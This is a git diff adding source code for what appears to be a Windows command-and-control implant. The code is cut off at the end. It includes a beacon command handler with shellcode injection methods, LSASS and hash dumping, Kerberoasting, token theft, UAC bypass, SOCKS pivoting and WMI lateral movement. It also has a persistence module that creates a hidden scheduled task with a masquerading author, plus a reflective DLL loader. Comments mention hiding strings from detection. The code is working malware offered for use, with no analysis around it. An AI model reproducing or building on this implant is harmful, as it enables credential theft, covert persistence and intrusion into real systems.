+ if (strcmp(cmd, "help") == 0 || strcmp(cmd, "h") == 0) + { + snprintf(output, OUTPUT_BUF_SIZE, "ok\n"); + ret = 0; + } + else if (strcmp(cmd, "ls") == 0) + { + ret = cmd_ls(args[0] ? args : ".", output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "mkdir") == 0) + { + ret = cmd_mkdir(args, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "rm") == 0) + { + ret = cmd_rm(args, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "cp") == 0) + { + char src[1024] = {0}, dst[1024] = {0}; + sscanf(args, "%1023s %1023s", src, dst); + ret = cmd_cp(src, dst, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "mv") == 0) + { + char src[1024] = {0}, dst[1024] = {0}; + sscanf(args, "%1023s %1023s", src, dst); + ret = cmd_mv(src, dst, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "reg") == 0) + { + /* reg: query|set|delete [...] */ + char action[16] = {0}; + char keypath[512] = {0}; + char valname[256] = {0}; + char type_s[32] = {0}; + char value[1024] = {0}; + + /* parse action */ + const char *p = args; + sscanf(p, "%15s", action); + p = strchr(p, ' '); + if (p) p++; + + if (p) { + /* parse key path, handles paths with spaces */ + const char *q = p; + const char *key_end = NULL; + int first_tok = 1; + while (*q) { + const char *tok = q; + while (*q && *q != ' ') q++; + int in_key = (first_tok && strncmp(tok, "HKEY_", 5) == 0); + if (!in_key) { + for (const char *c = tok; c < q; c++) + if (*c == '\\') { in_key = 1; break; } + } + if (in_key) { key_end = q; } + else { break; } + first_tok = 0; + if (*q == ' ') q++; + } + if (key_end) { + size_t klen = (size_t)(key_end - p); + if (klen >= sizeof(keypath)) klen = sizeof(keypath) - 1; + strncpy(keypath, p, klen); + keypath[klen] = '\0'; + p = key_end; + if (*p == ' ') p++; + if (!*p) p = NULL; + } else { + sscanf(p, "%511s", keypath); + p = strchr(p, ' '); + if (p) p++; + } + } + + if (strcmp(action, "query") == 0) { + if (p) sscanf(p, "%255s", valname); + ret = cmd_reg_query(keypath, valname, + output, OUTPUT_BUF_SIZE); + } else if (strcmp(action, "set") == 0) { + /* valname type value (value may contain spaces) */ + if (p) { + sscanf(p, "%255s", valname); + p = strchr(p, ' '); + if (p) p++; + } + if (p) { + sscanf(p, "%31s", type_s); + p = strchr(p, ' '); + if (p) p++; + } + if (p) { + strncpy(value, p, sizeof(value) - 1); + value[sizeof(value) - 1] = '\0'; + } + ret = cmd_reg_set(keypath, valname, type_s, value, + output, OUTPUT_BUF_SIZE); + } else if (strcmp(action, "delete") == 0) { + if (p) sscanf(p, "%255s", valname); + ret = cmd_reg_delete(keypath, valname, + output, OUTPUT_BUF_SIZE); + } else { + snprintf(output, OUTPUT_BUF_SIZE, + "[reg] usage: query|set|delete ...\n"); + ret = -1; + } + } +#ifndef LEAN + else if (_cmdeq(cmd, EVS_str_cmd_shinject, sizeof(EVS_str_cmd_shinject))) + { + if (!data || !data[0]) { + snprintf(output, OUTPUT_BUF_SIZE, "e:0\n"); + } else { + size_t sc_len = 0; + uint8_t *sc = base64_decode(data, &sc_len); + if (!sc) { + snprintf(output, OUTPUT_BUF_SIZE, "e:b64\n"); + } else { + ret = inject_self(sc, sc_len); + SecureZeroMemory(sc, sc_len); + free(sc); + if (ret == 0) + snprintf(output, OUTPUT_BUF_SIZE, "ok:%zu\n", sc_len); + else + snprintf(output, OUTPUT_BUF_SIZE, "rc:%d\n", ret); + } + } + } +#endif /* LEAN */ + else if (strcmp(cmd, "shell") == 0) + { + ret = cmd_shell(args, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "sysinfo") == 0) + { + ret = cmd_sysinfo(output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "ps") == 0) + { + ret = cmd_ps(output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "getpid") == 0) + { + ret = cmd_getpid(args, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "download") == 0) + { + ret = cmd_download(args, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "upload") == 0) + { + /* args = destination path, data = base64 file content */ + ret = cmd_upload(args, data, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "sleep") == 0) + { + DWORD ms = (DWORD)strtoul(args, NULL, 10); + beacon_sleep_obf(ms); + snprintf(output, OUTPUT_BUF_SIZE, "ok:%lu\n", ms); + ret = 0; + } +#ifndef LEAN + else if (_cmdeq(cmd, EVS_str_cmd_inject, sizeof(EVS_str_cmd_inject))) + { + /* inject: args = "[pid] [method]", data = base64 shellcode */ + char pid_s[16] = {0}; + char method_s[16] = {0}; + char extra[512] = {0}; /* optional dll_path for stomp */ + sscanf(args, "%15s %15s %511s", pid_s, method_s, extra); + + DWORD pid = (DWORD)strtoul(pid_s, NULL, 10); + if (pid == 0) pid = inject_find_target(); + + if (pid == 0) { + snprintf(output, OUTPUT_BUF_SIZE, "e:pid\n"); + } else { + size_t sc_len = 0; + uint8_t *sc = base64_decode(data, &sc_len); + if (!sc) { + snprintf(output, OUTPUT_BUF_SIZE, "e:b64\n"); + } else { + /* method names as char arrays — no plaintext in .rdata */ + char _mh[] = {'h','i','j','a','c','k',0}; + char _me[] = {'e','a','r','l','y','b','i','r','d',0}; + char _ms[] = {'s','t','o','m','p',0}; + int use_hijack = (strcmp(method_s, _mh) == 0); + int use_earlybird = (strcmp(method_s, _me) == 0); + int use_stomp = (strcmp(method_s, _ms) == 0); + + if (use_earlybird) { + ret = inject_earlybird(sc, sc_len); + SecureZeroMemory(sc, sc_len); + free(sc); + snprintf(output, OUTPUT_BUF_SIZE, + ret == 0 ? "ok\n" : "rc:%d\n", ret); + } else if (use_stomp) { + ret = inject_stomp(pid, sc, sc_len, + extra[0] ? extra : NULL); + SecureZeroMemory(sc, sc_len); + free(sc); + if (ret == 0) + snprintf(output, OUTPUT_BUF_SIZE, "ok:%lu\n", + (unsigned long)pid); + else + snprintf(output, OUTPUT_BUF_SIZE, "rc:%d:%lu\n", + ret, (unsigned long)pid); + } else { + ret = use_hijack + ? inject_thread_hijack(pid, sc, sc_len) + : inject_remote(pid, sc, sc_len); + SecureZeroMemory(sc, sc_len); + free(sc); + if (ret == 0) + snprintf(output, OUTPUT_BUF_SIZE, "ok:%lu\n", + (unsigned long)pid); + else + snprintf(output, OUTPUT_BUF_SIZE, "rc:%d:%lu\n", + ret, (unsigned long)pid); + } + } + } + } +#endif /* LEAN */ + else if (_cmdeq(cmd, EVS_str_cmd_bof, sizeof(EVS_str_cmd_bof))) + { + /* bof: data = b64 COFF, args = b64 packed BOF args */ + ret = cmd_bof(data, args[0] ? args : NULL, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "socks") == 0) + { + char action[16] = {0}; + char portstr[8] = {0}; + sscanf(args, "%15s %7s", action, portstr); + if (strcmp(action, "start") == 0) { + unsigned short port = (unsigned short)strtoul(portstr, NULL, 10); + if (!port) port = 1080; + ret = socks_start(port, output, OUTPUT_BUF_SIZE); + } else if (strcmp(action, "stop") == 0) { + ret = socks_stop(output, OUTPUT_BUF_SIZE); + } else if (strcmp(action, "status") == 0) { + snprintf(output, OUTPUT_BUF_SIZE, "[socks] %s\n", + socks_running() ? "running" : "stopped"); + ret = 0; + } else { + snprintf(output, OUTPUT_BUF_SIZE, + "[socks] usage: start | stop | status\n"); + ret = -1; + } + } + else if (strcmp(cmd, "rportfwd") == 0) + { + /* rportfwd: start | stop | list */ + char action[16] = {0}; + char p1[256] = {0}; /* lport or rhost */ + char p2[256] = {0}; /* rhost */ + char p3[8] = {0}; /* rport */ + sscanf(args, "%15s %255s %255s %7s", action, p1, p2, p3); + + if (strcmp(action, "start") == 0) { + unsigned short lport = (unsigned short)strtoul(p1, NULL, 10); + unsigned short rport = (unsigned short)strtoul(p3, NULL, 10); + if (!lport || !rport || !p2[0]) { + snprintf(output, OUTPUT_BUF_SIZE, + "[rportfwd] usage: start \n"); + ret = -1; + } else { + ret = rportfwd_start(lport, p2, rport, output, OUTPUT_BUF_SIZE); + } + } else if (strcmp(action, "stop") == 0) { + unsigned short lport = (unsigned short)strtoul(p1, NULL, 10); + ret = rportfwd_stop(lport, output, OUTPUT_BUF_SIZE); + } else if (strcmp(action, "list") == 0) { + ret = rportfwd_list(output, OUTPUT_BUF_SIZE); + } else { + snprintf(output, OUTPUT_BUF_SIZE, + "[rportfwd] usage: start | stop | list\n"); + ret = -1; + } + } + else if (strcmp(cmd, "persist") == 0) + { + /* persist: install registry|schtask|auto | remove registry|schtask */ + char action[16] = {0}; + char method_s[16] = {0}; + sscanf(args, "%15s %15s", action, method_s); + + if (strcmp(action, "install") == 0) { + if (strcmp(method_s, "registry") == 0) + ret = persist_install(PERSIST_REGISTRY); + else if (strcmp(method_s, "schtask") == 0) + ret = persist_install(PERSIST_SCHTASK); + else + ret = persist_auto(); + snprintf(output, OUTPUT_BUF_SIZE, + "[persist] install rc=%d\n", ret); + } else if (strcmp(action, "remove") == 0) { + persist_method_t m = (strcmp(method_s, "registry") == 0) + ? PERSIST_REGISTRY : PERSIST_SCHTASK; + ret = persist_remove(m); + snprintf(output, OUTPUT_BUF_SIZE, + "[persist] remove rc=%d\n", ret); + } else { + snprintf(output, OUTPUT_BUF_SIZE, + "[persist] usage: install registry|schtask|auto / remove registry|schtask\n"); + ret = -1; + } + } +#ifndef LEAN + else if (_cmdeq(cmd, EVS_str_cmd_lsassdump, sizeof(EVS_str_cmd_lsassdump))) + { + ret = cmd_lsassdump(args[0] ? args : NULL, + output, OUTPUT_BUF_SIZE); + } + else if (_cmdeq(cmd, EVS_str_cmd_hashdump, sizeof(EVS_str_cmd_hashdump))) + { + ret = cmd_hashdump(args[0] ? args : NULL, + output, OUTPUT_BUF_SIZE); + } +#endif /* LEAN */ + else if (strcmp(cmd, "portscan") == 0) + { + /* portscan: - [timeout_ms] */ + char host_s[256] = {0}; + char range_s[32] = {0}; + char timeout_s[16] = {0}; + sscanf(args, "%255s %31s %15s", host_s, range_s, timeout_s); + + unsigned short pstart = 1, pend = 1024; + char *dash = strchr(range_s, '-'); + if (dash) { + *dash = '\0'; + pstart = (unsigned short)strtoul(range_s, NULL, 10); + pend = (unsigned short)strtoul(dash + 1, NULL, 10); + } else if (range_s[0]) { + pstart = pend = (unsigned short)strtoul(range_s, NULL, 10); + } + int toms = timeout_s[0] ? (int)strtoul(timeout_s, NULL, 10) : 500; + ret = cmd_portscan(host_s, pstart, pend, toms, + output, OUTPUT_BUF_SIZE); + } +#ifndef LEAN + else if (strcmp(cmd, "screenshot") == 0) + { + ret = cmd_screenshot(output, OUTPUT_BUF_SIZE); + } + else if (_cmdeq(cmd, EVS_str_cmd_execasm, sizeof(EVS_str_cmd_execasm))) + { + /* execute-assembly: data = b64 PE, args for Main */ + size_t asm_len = 0; + uint8_t *asm_bytes = base64_decode(data, &asm_len); + if (!asm_bytes) { + snprintf(output, OUTPUT_BUF_SIZE, + "[execute-assembly] b64 decode failed\n"); + } else { + ret = cmd_execasm(asm_bytes, asm_len, + args[0] ? args : NULL, + output, OUTPUT_BUF_SIZE); + SecureZeroMemory(asm_bytes, asm_len); + free(asm_bytes); + } + } +#endif /* LEAN */ + else if (strcmp(cmd, "privs") == 0) + { + /* args: list | enable | disable */ + char action[16] = {0}; + char priv_name[64] = {0}; + sscanf(args, "%15s %63s", action, priv_name); + ret = cmd_privs(action[0] ? action : "list", + priv_name, output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "spawn") == 0) + { + /* spawn: [real_args] */ + char exe_path[512] = {0}; + char fake_args[1024] = {0}; + char real_args[1024] = {0}; + + /* first field: exe_path */ + const char *p = args; + sscanf(p, "%511s", exe_path); + p = strchr(p, ' '); + if (p) p++; + + /* second field: fake_args */ + if (p) { + sscanf(p, "%1023s", fake_args); + p = strchr(p, ' '); + if (p) p++; + } + + /* rest: real_args, may contain spaces */ + if (p && p[0]) { + strncpy(real_args, p, sizeof(real_args) - 1); + real_args[sizeof(real_args) - 1] = '\0'; + } + + ret = cmd_spawn(exe_path, fake_args, + real_args[0] ? real_args : NULL, + output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "wmiexec") == 0) + { + /* wmiexec: , split on first space */ + char host_s[256] = {0}; + char wcmd[2048] = {0}; + const char *wp = args; + sscanf(wp, "%255s", host_s); + wp = strchr(wp, ' '); + if (wp) { wp++; strncpy(wcmd, wp, sizeof(wcmd) - 1); } + ret = cmd_wmiexec(host_s, wcmd, output, OUTPUT_BUF_SIZE); + } + else if (_cmdeq(cmd, EVS_str_cmd_uacbypass, sizeof(EVS_str_cmd_uacbypass))) + { + ret = cmd_uacbypass(args, output, OUTPUT_BUF_SIZE); + } + else if (_cmdeq(cmd, EVS_str_cmd_getsystem, sizeof(EVS_str_cmd_getsystem))) + { + ret = cmd_getsystem(args, output, OUTPUT_BUF_SIZE); + } + else if (_cmdeq(cmd, EVS_str_cmd_privesc, sizeof(EVS_str_cmd_privesc))) + { + ret = cmd_privesc(output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "lpe_check") == 0) + { + ret = cmd_lpe_check(args, output, OUTPUT_BUF_SIZE); + } +#ifndef LEAN + else if (_cmdeq(cmd, EVS_str_cmd_kerberoast, sizeof(EVS_str_cmd_kerberoast))) + { + ret = cmd_kerberoast(args, output, OUTPUT_BUF_SIZE); + } + else if (_cmdeq(cmd, EVS_str_cmd_asreproast, sizeof(EVS_str_cmd_asreproast))) + { + ret = cmd_asreproast(args, output, OUTPUT_BUF_SIZE); + } +#endif /* LEAN */ + else if (strcmp(cmd, "getuid") == 0) + { + ret = cmd_getuid(output, OUTPUT_BUF_SIZE); + } + else if (_cmdeq(cmd, EVS_str_cmd_steal_token, sizeof(EVS_str_cmd_steal_token))) + { + unsigned long pid = strtoul(args, NULL, 10); + if (!pid) { + snprintf(output, OUTPUT_BUF_SIZE, "[st] usage: st \n"); + ret = -1; + } else { + ret = cmd_steal_token(pid, output, OUTPUT_BUF_SIZE); + } + } + else if (strcmp(cmd, "rev2self") == 0) + { + ret = cmd_rev2self(output, OUTPUT_BUF_SIZE); + } + else if (strcmp(cmd, "make_token") == 0) + { + /* make_token: args = "DOMAIN\\user password" */ + char domain_user[256] = {0}; + char password[256] = {0}; + char *sp = strchr(args, ' '); + if (sp) { + size_t du_len = (size_t)(sp - args); + if (du_len >= sizeof(domain_user)) + du_len = sizeof(domain_user) - 1; + memcpy(domain_user, args, du_len); + strncpy(password, sp + 1, sizeof(password) - 1); + } else { + size_t alen = strlen(args); + if (alen >= sizeof(domain_user)) alen = sizeof(domain_user) - 1; + memcpy(domain_user, args, alen); + domain_user[alen] = '\0'; + } + ret = cmd_make_token(domain_user, password, + output, OUTPUT_BUF_SIZE); + SecureZeroMemory(password, sizeof(password)); + } + else if (strcmp(cmd, "kill") == 0) + { + DWORD pid = (DWORD)strtoul(args, NULL, 10); + HANDLE hproc = OpenProcess(PROCESS_TERMINATE, FALSE, pid); + if (!hproc) { + snprintf(output, OUTPUT_BUF_SIZE, + "[kill] OpenProcess(%lu) failed: %lu\n", + (unsigned long)pid, GetLastError()); + } else { + TerminateProcess(hproc, 1); + CloseHandle(hproc); + snprintf(output, OUTPUT_BUF_SIZE, + "[kill] pid=%lu terminated\n", + (unsigned long)pid); + ret = 0; + } + } + else if (strcmp(cmd, "cd") == 0) + { + if (SetCurrentDirectoryA(args[0] ? args : ".")) { + GetCurrentDirectoryA((DWORD)OUTPUT_BUF_SIZE, output); + size_t n = strlen(output); + if (n < OUTPUT_BUF_SIZE - 1) { + output[n] = '\n'; output[n+1] = '\0'; + } + ret = 0; + } else { + snprintf(output, OUTPUT_BUF_SIZE, + "[cd] failed: %lu\n", GetLastError()); + } + } + else if (strcmp(cmd, "pwd") == 0) + { + if (GetCurrentDirectoryA((DWORD)OUTPUT_BUF_SIZE, output) > 0) { + size_t n = strlen(output); + if (n < OUTPUT_BUF_SIZE - 1) { + output[n] = '\n'; output[n+1] = '\0'; + } + ret = 0; + } else { + snprintf(output, OUTPUT_BUF_SIZE, + "[pwd] failed: %lu\n", GetLastError()); + } + } + else + { + snprintf(output, OUTPUT_BUF_SIZE, + "[error] unknown command: %s\n", cmd); + } + + beacon_append_output(&agent, output, strlen(output)); + free(output); + } + free(data); + } + + beacon_sleep(); + } + +done: + agent_free(&agent); +#ifndef HTTP_ONLY + curl_global_cleanup(); +#endif +} + +/* ------------------------------------------------------------------ */ +/* Entry points */ +/* ------------------------------------------------------------------ */ + +#ifdef _REFLECTIVE_DLL +void agent_main(void) { agent_run(); } +#else + +static SERVICE_STATUS_HANDLE g_ssh = NULL; +static SERVICE_STATUS g_ss = {0}; + +static void _svc_set(DWORD state, DWORD hint) +{ + g_ss.dwServiceType = SERVICE_WIN32_OWN_PROCESS; + g_ss.dwCurrentState = state; + g_ss.dwControlsAccepted = (state == SERVICE_START_PENDING) ? 0 : SERVICE_ACCEPT_STOP; + g_ss.dwWin32ExitCode = NO_ERROR; + g_ss.dwServiceSpecificExitCode = 0; + g_ss.dwCheckPoint = (state == SERVICE_RUNNING || state == SERVICE_STOPPED) ? 0 : 1; + g_ss.dwWaitHint = hint; + { const adv_api_t *_a = adv_get(); if (_a->SetServiceStatus) _a->SetServiceStatus(g_ssh, &g_ss); } +} + +static DWORD WINAPI _svc_agent_thread(LPVOID p) { (void)p; agent_run(); return 0; } + +static VOID WINAPI _svc_ctrl(DWORD ctrl) +{ + if (ctrl == SERVICE_CONTROL_STOP) { + _svc_set(SERVICE_STOP_PENDING, 3000); + ExitProcess(0); + } +} + +static VOID WINAPI _svc_main(DWORD argc, LPSTR *argv) +{ + const char *sn = (argc > 0 && argv && argv[0]) ? argv[0] : ""; + { const adv_api_t *_a = adv_get(); + if (_a->RegisterServiceCtrlHandlerA) + g_ssh = _a->RegisterServiceCtrlHandlerA(sn, _svc_ctrl); + } + if (!g_ssh) return; + _svc_set(SERVICE_START_PENDING, 3000); + HANDLE ht = CreateThread(NULL, 0, _svc_agent_thread, NULL, 0, NULL); + _svc_set(SERVICE_RUNNING, 0); + if (ht) { WaitForSingleObject(ht, INFINITE); CloseHandle(ht); } + _svc_set(SERVICE_STOPPED, 0); +} + +int WINAPI WinMain(HINSTANCE hI, HINSTANCE hP, LPSTR lp, int nC) +{ + (void)hI; (void)hP; (void)lp; (void)nC; + SERVICE_TABLE_ENTRYA ste[] = { {"", _svc_main}, {NULL, NULL} }; + const adv_api_t *_adv = adv_get(); + if (!_adv->StartServiceCtrlDispatcherA || !_adv->StartServiceCtrlDispatcherA(ste)) { + if (GetLastError() == ERROR_FAILED_SERVICE_CONTROLLER_CONNECT) + agent_run(); + } + return 0; +} +#endif /* _REFLECTIVE_DLL */ diff --git a/agent/src/persist/persist.c b/agent/src/persist/persist.c new file mode 100644 index 0000000..8967e27 --- /dev/null +++ b/agent/src/persist/persist.c @@ -0,0 +1,269 @@ +#define COBJMACROS +#define INITGUID + +#include "persist.h" +#include "evs_strings.h" +#include +#include +#include +#include +#include + +static void _exe_path(char *buf, DWORD sz) +{ + GetModuleFileNameA(NULL, buf, sz); +} + +/* Build BSTR from narrow string — avoids wide string literals in .rdata */ +static BSTR _bstr_from_chars(const char *s) +{ + int n = (int)strlen(s); + WCHAR *w = (WCHAR *)HeapAlloc(GetProcessHeap(), 0, (size_t)(n + 1) * sizeof(WCHAR)); + if (!w) return NULL; + for (int i = 0; i < n; i++) w[i] = (WCHAR)(unsigned char)s[i]; + w[n] = L'\0'; + BSTR b = SysAllocString(w); + HeapFree(GetProcessHeap(), 0, w); + return b; +} + +/* registry Run key persistence (HKCU, no elevation needed) */ + +static int _reg_install(const char *path) +{ + char _rk[46], _rv[23]; + EVS_D(_rk, EVS_str_reg_run_key); + EVS_D(_rv, EVS_str_persist_reg_val); + HKEY hk; + if (RegOpenKeyExA(HKEY_CURRENT_USER, _rk, 0, KEY_SET_VALUE, &hk) != ERROR_SUCCESS) { + SecureZeroMemory(_rk, sizeof(_rk)); + SecureZeroMemory(_rv, sizeof(_rv)); + return -1; + } + LONG rc = RegSetValueExA(hk, _rv, 0, REG_SZ, + (const BYTE *)path, (DWORD)(strlen(path) + 1)); + RegCloseKey(hk); + SecureZeroMemory(_rk, sizeof(_rk)); + SecureZeroMemory(_rv, sizeof(_rv)); + return rc == ERROR_SUCCESS ? 0 : -1; +} + +static int _reg_remove(void) +{ + char _rk[46], _rv[23]; + EVS_D(_rk, EVS_str_reg_run_key); + EVS_D(_rv, EVS_str_persist_reg_val); + HKEY hk; + if (RegOpenKeyExA(HKEY_CURRENT_USER, _rk, 0, KEY_SET_VALUE, &hk) != ERROR_SUCCESS) { + SecureZeroMemory(_rk, sizeof(_rk)); + SecureZeroMemory(_rv, sizeof(_rv)); + return -1; + } + RegDeleteValueA(hk, _rv); + RegCloseKey(hk); + SecureZeroMemory(_rk, sizeof(_rk)); + SecureZeroMemory(_rv, sizeof(_rv)); + return 0; +} + +static int _schtask_install(const char *exe_path) +{ + HRESULT hr; + int rc = -1; + + hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); + BOOL need_uninit = (hr == S_OK || hr == S_FALSE); + + ITaskService *pSvc = NULL; + hr = CoCreateInstance(&CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, + &IID_ITaskService, (void **)&pSvc); + if (FAILED(hr)) goto co_done; + + { + VARIANT v; VariantInit(&v); + if (FAILED(pSvc->lpVtbl->Connect(pSvc, v, v, v, v))) + goto svc_done; + } + + ITaskFolder *pFolder = NULL; + { + BSTR root = SysAllocString(L"\\"); + hr = pSvc->lpVtbl->GetFolder(pSvc, root, &pFolder); + SysFreeString(root); + if (FAILED(hr)) goto svc_done; + } + + ITaskDefinition *pDef = NULL; + if (FAILED(pSvc->lpVtbl->NewTask(pSvc, 0, &pDef))) + goto folder_done; + +/* author field for masquerading */ + { + IRegistrationInfo *pi = NULL; + if (SUCCEEDED(pDef->lpVtbl->get_RegistrationInfo(pDef, &pi))) { + char _auth[22]; + EVS_D(_auth, EVS_str_persist_author); + BSTR auth = _bstr_from_chars(_auth); + SecureZeroMemory(_auth, sizeof(_auth)); + pi->lpVtbl->put_Author(pi, auth); + SysFreeString(auth); + pi->lpVtbl->Release(pi); + } + } + + /* principal: interactive token, no elevation */ + { + IPrincipal *pp = NULL; + if (SUCCEEDED(pDef->lpVtbl->get_Principal(pDef, &pp))) { + pp->lpVtbl->put_LogonType(pp, TASK_LOGON_INTERACTIVE_TOKEN); + pp->lpVtbl->Release(pp); + } + } + + /* settings: hidden, runs on battery, starts when available */ + { + ITaskSettings *ps = NULL; + if (SUCCEEDED(pDef->lpVtbl->get_Settings(pDef, &ps))) { + ps->lpVtbl->put_Hidden(ps, VARIANT_TRUE); + ps->lpVtbl->put_StartWhenAvailable(ps, VARIANT_TRUE); + ps->lpVtbl->put_StopIfGoingOnBatteries(ps, VARIANT_FALSE); + ps->lpVtbl->put_DisallowStartIfOnBatteries(ps, VARIANT_FALSE); + ps->lpVtbl->Release(ps); + } + } + + /* logon trigger */ + { + ITriggerCollection *ptc = NULL; + if (SUCCEEDED(pDef->lpVtbl->get_Triggers(pDef, &ptc))) { + ITrigger *pt = NULL; + if (SUCCEEDED(ptc->lpVtbl->Create(ptc, TASK_TRIGGER_LOGON, &pt))) { + ILogonTrigger *plt = NULL; + if (SUCCEEDED(pt->lpVtbl->QueryInterface(pt, + &IID_ILogonTrigger, (void **)&plt))) { + char _tid[13]; + EVS_D(_tid, EVS_str_persist_trigger_id); + BSTR id = _bstr_from_chars(_tid); + SecureZeroMemory(_tid, sizeof(_tid)); + plt->lpVtbl->put_Id(plt, id); + SysFreeString(id); + plt->lpVtbl->Release(plt); + } + pt->lpVtbl->Release(pt); + } + ptc->lpVtbl->Release(ptc); + } + } + + /* exec action */ + { + IActionCollection *pac = NULL; + if (SUCCEEDED(pDef->lpVtbl->get_Actions(pDef, &pac))) { + IAction *pa = NULL; + if (SUCCEEDED(pac->lpVtbl->Create(pac, TASK_ACTION_EXEC, &pa))) { + IExecAction *pea = NULL; + if (SUCCEEDED(pa->lpVtbl->QueryInterface(pa, + &IID_IExecAction, (void **)&pea))) { + BSTR p = _bstr_from_chars(exe_path); + pea->lpVtbl->put_Path(pea, p); + SysFreeString(p); + pea->lpVtbl->Release(pea); + } + pa->lpVtbl->Release(pa); + } + pac->lpVtbl->Release(pac); + } + } + + /* register task */ + { + char _tn[35]; + EVS_D(_tn, EVS_str_persist_task_name); + BSTR name = _bstr_from_chars(_tn); + SecureZeroMemory(_tn, sizeof(_tn)); + VARIANT ve; VariantInit(&ve); + IRegisteredTask *preg = NULL; + hr = pFolder->lpVtbl->RegisterTaskDefinition(pFolder, name, pDef, + TASK_CREATE_OR_UPDATE, ve, ve, + TASK_LOGON_INTERACTIVE_TOKEN, ve, &preg); + SysFreeString(name); + if (SUCCEEDED(hr)) { + rc = 0; + if (preg) preg->lpVtbl->Release(preg); + } + } + + pDef->lpVtbl->Release(pDef); +folder_done: + pFolder->lpVtbl->Release(pFolder); +svc_done: + pSvc->lpVtbl->Release(pSvc); +co_done: + if (need_uninit) CoUninitialize(); + return rc; +} + +static int _schtask_remove(void) +{ + HRESULT hr; + int rc = -1; + + hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); + BOOL need_uninit = (hr == S_OK || hr == S_FALSE); + + ITaskService *pSvc = NULL; + if (FAILED(CoCreateInstance(&CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, + &IID_ITaskService, (void **)&pSvc))) + goto co_done2; + + { + VARIANT v; VariantInit(&v); + pSvc->lpVtbl->Connect(pSvc, v, v, v, v); + } + + ITaskFolder *pFolder = NULL; + { + BSTR root = SysAllocString(L"\\"); + pSvc->lpVtbl->GetFolder(pSvc, root, &pFolder); + SysFreeString(root); + } + + if (pFolder) { + char _tn[35]; + EVS_D(_tn, EVS_str_persist_task_name); + BSTR name = _bstr_from_chars(_tn); + SecureZeroMemory(_tn, sizeof(_tn)); + if (SUCCEEDED(pFolder->lpVtbl->DeleteTask(pFolder, name, 0))) + rc = 0; + SysFreeString(name); + pFolder->lpVtbl->Release(pFolder); + } + + pSvc->lpVtbl->Release(pSvc); +co_done2: + if (need_uninit) CoUninitialize(); + return rc; +} + +/* public API */ + +int persist_install(persist_method_t method) +{ + char path[MAX_PATH]; + _exe_path(path, MAX_PATH); + return method == PERSIST_SCHTASK ? _schtask_install(path) : _reg_install(path); +} + +int persist_remove(persist_method_t method) +{ + return method == PERSIST_SCHTASK ? _schtask_remove() : _reg_remove(); +} + +int persist_auto(void) +{ + char path[MAX_PATH]; + _exe_path(path, MAX_PATH); + if (_schtask_install(path) == 0) return PERSIST_SCHTASK; + if (_reg_install(path) == 0) return PERSIST_REGISTRY; + return -1; +} diff --git a/agent/src/reflect/dllmain.c b/agent/src/reflect/dllmain.c new file mode 100644 index 0000000..b4ab59a --- /dev/null +++ b/agent/src/reflect/dllmain.c @@ -0,0 +1,22 @@ +#ifdef _REFLECTIVE_DLL +#include + +void agent_main(void); + +static DWORD WINAPI _agent_thread(LPVOID param) +{ + (void)param; + agent_main(); + return 0; +} + +BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpReserved) +{ + (void)lpReserved; + if (dwReason == DLL_PROCESS_ATTACH) { + DisableThreadLibraryCalls(hInstDLL); + CreateThread(NULL, 0, _agent_thread, NULL, 0, NULL); + } + return TRUE; +} +#endif /* _REFLECTIVE_DLL */ diff --git a/agent/src/reflect/reflect.c b/agent/src/reflect/reflect.c new file mode 100644 index 0000000..ac59be4 --- /dev/null +++ b/agent/src/reflect/reflect.c @@ -0,0 +1,246 @@ +#ifdef _REFLECTIVE_DLL + +#include +#include +#include +#include + +/* Silence MinGW warning about DllMain not being declared */ +BOOL WINAPI DllMain(HINSTANCE, DWORD, LPVOID); + +/* full LDR_DATA_TABLE_ENTRY layout, MinGW winternl.h only exposes FullDllName */ +typedef struct _MY_LDR_ENTRY { + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; +} MY_LDR_ENTRY; + +typedef struct _MY_PEB_LDR { + ULONG Length; + BOOLEAN Initialized; + PVOID SsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; +} MY_PEB_LDR; + +typedef struct _MY_PEB { + BYTE Reserved[2]; + BYTE BeingDebugged; + BYTE Reserved2[1]; + PVOID Reserved3[2]; + MY_PEB_LDR *Ldr; +} MY_PEB; + +typedef HMODULE (WINAPI *pLoadLibraryA_t)(LPCSTR); +typedef FARPROC (WINAPI *pGetProcAddress_t)(HMODULE, LPCSTR); +typedef LPVOID (WINAPI *pVirtualAlloc_t)(LPVOID, SIZE_T, DWORD, DWORD); +typedef BOOL (WINAPI *pFlushInstructionCache_t)(HANDLE, LPCVOID, SIZE_T); +typedef BOOL (WINAPI *pVirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD); +typedef HANDLE (WINAPI *pGetCurrentProcess_t)(void); +typedef BOOL (WINAPI *pDllMain_t)(HINSTANCE, DWORD, LPVOID); + +static int _eqstr(const char *a, const char *b) +{ + while (*a && *b && (*a | 0x20) == (*b | 0x20)) { a++; b++; } + return (*a == '\0' && *b == '\0'); +} + +static int _weq12(const WCHAR *w, const char *s) +{ + for (int i = 0; i < 12; i++) { + if (!w[i] && !s[i]) return 1; + if (!w[i] || !s[i]) return 0; + if ((w[i] | 0x20) != (s[i] | 